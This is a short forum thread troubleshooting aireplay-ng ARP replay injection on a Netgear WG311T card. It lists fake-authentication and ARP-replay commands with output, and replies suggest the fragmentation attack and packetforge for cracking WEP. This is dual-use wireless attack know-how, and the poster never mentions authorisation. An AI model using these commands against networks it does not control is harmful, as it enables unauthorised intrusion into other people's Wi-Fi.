-
why my WG311t can't use injection in aireplay
why my WG311t can't use injection in aireplay
i use live cd bt2.0 with netgear wg311t
aireplay-ng --1 0 -a 00:11:22:33:44:55 -h 66:77:88:99:00:AA ath0
when i use command
aireplay-ng -3 -b 00:11:22:33:44:55 -h 66:77:88:99:00:AA ath0
i have recieve packet too much but no arp and no sent
howerever i can crack wep but this operation may take a long time
-
Developer
There are no issues with this card, so I suspect it your commands.
Can you post the exact commands you are using from start to finish, including any messages you get.
-
my command is
why my APR requests is 0 and sent packets is 0 ?
what 's wrong ?
# aireplay-ng -1 0 -e NTSAP -a 00:A0:B0:40:5C:12 -h 00:11:22:33:44:55 ath0
12:14:06 Sending Authentication Request
12:14:06 Authentication successful
12:14:06 Sending Association Request
12:14:07 Association successful :-)
and
aireplay-ng -3 -b 00:A0:B0:40:5C:12 -h 00:11:22:33:44:55 ath0
Saving APR requests in replay_arp-1112-031550.cap
You must also start airodump to capture replies.
Read 39123 packets (got 0 APR requests), sent 0 packets...
-
You are not capturing a arp request. Some times with the -3 attack it can take a long time to get a arp request. there are two more attacks to try the -4 and the -5.
-
why not capturing arp request ?
Because WG311T card not support or accesspoint block or another ?
-
I actually have the exact same card - it works great.
Is it in monitor mode?
airmon-ng stop ath0
airmon-ng start ath0
If you are trying to crack an AP w/o any connected clients, obviously you won't get any traffic, let alone ARPs.
-
Use the fragmentation attack and get the prga key... Then make an arp packet with packetforge and send it using aireplay again.
-
Junior Member
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules